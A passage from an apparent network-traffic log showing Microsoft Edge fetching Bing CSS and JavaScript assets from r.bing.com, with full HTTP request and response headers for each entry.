last-modified: Thu, 14 Nov 2024 09:56:49 GMT
etag: 0x8DD0492A84467DF
content-length: 34646
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: jOLV9y5w0McLMFTgirjcZA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: fe486d02-b01e-0003-43bc-36e997000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.95777b5c.1731634749.ac38158
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=207518
expires: Fri, 06 Dec 2024 19:46:54 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1c82
timing-allow-origin: *
GET

https://r.bing.com/rp/0IiGQEhOxda1vuABEiqg-sdRgh4.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/0IiGQEhOxda1vuABEiqg-sdRgh4.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:28:32 GMT
etag: 0x8DCEC8663D9FEA5
content-length: 499
content-type: text/css
content-encoding: br
content-md5: q9iQN+s1g/jeEdZZRsnUZQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d069b859-601e-0001-13bc-36eb6d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.3d421202.1731633859.11c1764
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=115733
expires: Thu, 05 Dec 2024 18:17:09 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1e96
timing-allow-origin: *
GET

https://r.bing.com/rp/vj1N4awJ383HkYliZ3gv-reg-bU.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/vj1N4awJ383HkYliZ3gv-reg-bU.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:14:29 GMT
etag: 0x8DCE8C08276886A
content-length: 10161
content-type: text/css
content-encoding: br
content-md5: Rbkcx6uTyZqqLrbLK+uhIQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 20797631-701e-0073-49bc-369a53000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a7777b5c.1731633882.3f32c2
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=115693
expires: Thu, 05 Dec 2024 18:16:29 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1f6b
timing-allow-origin: *
GET

https://r.bing.com/rp/kgmfOehs05Ui8n8vCttwntNKCIY.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/kgmfOehs05Ui8n8vCttwntNKCIY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:31:57 GMT
etag: 0x8DCE8C2F3046A48
content-length: 18701
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 1enaVZtvtv3pu9rqYE+OhA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4adf252e-701e-0051-62bc-36f465000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b5777b5c.1731633858.b61a025
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=230991
expires: Sat, 07 Dec 2024 02:18:07 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1f74
timing-allow-origin: *
GET

https://r.bing.com/rp/p_j9RuPsyK6jjPOvubFDoJ8f_MQ.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/p_j9RuPsyK6jjPOvubFDoJ8f_MQ.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 49113
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: w+ApJHZysbuv5s5QWnnpjw==
last-modified: Thu, 10 Oct 2024 00:34:20 GMT
etag: 0x8DCE8C347C5599A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f8002abe-101e-0063-3ebc-36acb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=343968
expires: Sun, 08 Dec 2024 09:41:04 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1f75
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Dy98FJMYem973Rb50XgKI-ko_8Q.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/Dy98FJMYem973Rb50XgKI-ko_8Q.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:02:29 GMT
etag: 0x8DCDC5E79064DD8
content-length: 565
content-type: text/css; charset=utf-8
content-encoding: br
content-md5: k8XNVCCPuU7zRPBB7GzJFw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 53b6d126-b01e-004c-6818-162d8f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=62407
expires: Thu, 05 Dec 2024 03:28:23 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1f9b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/gHdfTtLEGuqIgyEoCJh39-wntJI.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/gHdfTtLEGuqIgyEoCJh39-wntJI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:47:42 GMT
etag: 0x8DD049162994A44
content-type: text/css
content-md5: vBmk0Gi/mGBF7Yl3fVYMXQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b42f127-301e-005d-1dfe-361a94000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 11211
vary: Accept-Encoding
akamai-grn: 0.a4421202.1731648422.54fd682
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=279107
expires: Sat, 07 Dec 2024 15:40:03 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1f9d
timing-allow-origin: *
GET

https://r.bing.com/rp/RIiFWqXRQOq-vw6eDsXaARNkxA4.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/RIiFWqXRQOq-vw6eDsXaARNkxA4.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:06:43 GMT
etag: 0x8DCE8BF6C2D2436
content-length: 8722
content-type: text/css
content-encoding: br
content-md5: S8bhDjL44fLruc9dhegshA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: df751f6d-b01e-002a-4dbd-369fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1731634475.8ed3a421
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=203005
expires: Fri, 06 Dec 2024 18:31:41 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1fa0
timing-allow-origin: *
GET

https://r.bing.com/rp/BlixR6YjnI13t9vX5FgpjwbYnnU.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/BlixR6YjnI13t9vX5FgpjwbYnnU.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:54:46 GMT
etag: 0x8DD04925F48C5D9
content-length: 4513
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: SWwVJRjen7+xXstQN6LJbQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c356db23-d01e-003a-5abc-36a933000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.2c421202.1731633860.1d1b72b
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=172841
expires: Fri, 06 Dec 2024 10:08:57 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1f9c
timing-allow-origin: *
GET

https://r.bing.com/rp/7AWAjv1jQEzS8MHYaXU1_XoLHsM.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/7AWAjv1jQEzS8MHYaXU1_XoLHsM.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:55:51 GMT
etag: 0x8DD049286224386
content-length: 115881
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Y6xdLtXlxJE6FC/lo3Ij+w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2cc053b0-801e-0029-4fbc-369cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a1777b5c.1731634775.15bfff3
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=215180
expires: Fri, 06 Dec 2024 21:54:36 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1fa1
timing-allow-origin: *
GET

https://r.bing.com/rp/JfUnx6Molk-Wx9VZPqwjNTc7e8Y.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/JfUnx6Molk-Wx9VZPqwjNTc7e8Y.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:45:52 GMT
etag: 0x8DD0491209B687C
content-length: 6501
content-type: text/css
content-encoding: br
content-md5: gN83y/iUYCAg6VSeC7lWVw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: df751f52-b01e-002a-35bd-369fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.a9777b5c.1731634475.13963b51
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=292609
expires: Sat, 07 Dec 2024 19:25:05 GMT
date: Wed, 04 Dec 2024 10:08:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306896.1af1f9e
timing-allow-origin: *
GET

https://r.bing.com/rp/uEivANhe4alBPDXv8CkbJTofBhk.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/uEivANhe4alBPDXv8CkbJTofBhk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:48:17 GMT
etag: 0x8DD04917779D5FE
content-length: 3788
content-type: text/css
content-encoding: br
content-md5: KvfGtDNunQN6yvSiaM6Ncw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cb78bf55-a01e-003e-10bc-365cb1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b5777b5c.1731633860.b614a70
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=307971
expires: Sat, 07 Dec 2024 23:41:09 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26d4
timing-allow-origin: *
GET

https://r.bing.com/rp/m-7xkuKwEqsTNjLeS3UNuQySPp4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/m-7xkuKwEqsTNjLeS3UNuQySPp4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:09:49 GMT
etag: 0x8DCE8BFDB926145
content-length: 4676
content-type: text/css
content-encoding: br
content-md5: JKOT82N1+3mrtYun//sJyw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 433f853a-701e-0078-78bc-368227000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1731624228.8df655da
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=341818
expires: Sun, 08 Dec 2024 09:05:16 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26d8
timing-allow-origin: *
GET

https://r.bing.com/rp/M0AIWDvfLfn5lf4z28LDBW2Z4Qc.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/M0AIWDvfLfn5lf4z28LDBW2Z4Qc.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/javascript; charset=utf-8
content-md5: k8fxgYJg+JihZO4Uz6uasA==
last-modified: Thu, 10 Oct 2024 00:34:09 GMT
etag: 0x8DCE8C341A09876
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 397f4820-701e-0037-68ff-36463f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 6042
cache-control: public, no-transform, max-age=124273
expires: Thu, 05 Dec 2024 20:39:31 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26d2
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Ve-pa37jjThEf2RztigDGfA0rZM.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/Ve-pa37jjThEf2RztigDGfA0rZM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:55 GMT
etag: 0x8DCE8C31580AF63
content-length: 31661
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: OhsBAvJVOXIGcP7FBia1FA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 63137d21-201e-0006-7fbc-361de8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.c66c645f.1731633860.2fce134
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=120197
expires: Thu, 05 Dec 2024 19:31:35 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26d3
timing-allow-origin: *
GET

https://r.bing.com/rp/LVcd2RDIJz9noXR3SokUHsLP5Qk.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/LVcd2RDIJz9noXR3SokUHsLP5Qk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 19 Nov 2024 02:54:49 GMT
etag: 0x8DD0845888FAE15
content-length: 11313
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: t8vaK9iIXR+nHx/OYehFeA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 14309ce3-201e-000d-7b4e-3a059c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.4b367a5c.1732007202.2bd66ac
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=303380
expires: Sat, 07 Dec 2024 22:24:38 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26d5
timing-allow-origin: *
GET

https://r.bing.com/rp/P3oQJELSSmISYcsipFOP4JRUlL0.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/P3oQJELSSmISYcsipFOP4JRUlL0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 19 Nov 2024 02:54:48 GMT
etag: 0x8DD0845884CE27F
content-length: 9436
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 4YQVvBGtUvAckoXj/yGK8g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e560c565-901e-0036-1b4e-3a47c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.ae8f655f.1732006511.27e9076
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=131359
expires: Thu, 05 Dec 2024 22:37:37 GMT
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306898.1af26d6
timing-allow-origin: *
GET

https://r.bing.com/rp/LIEHzv436maqEs91Bl64_t5z744.br.css

msedge.exe

Remote address:

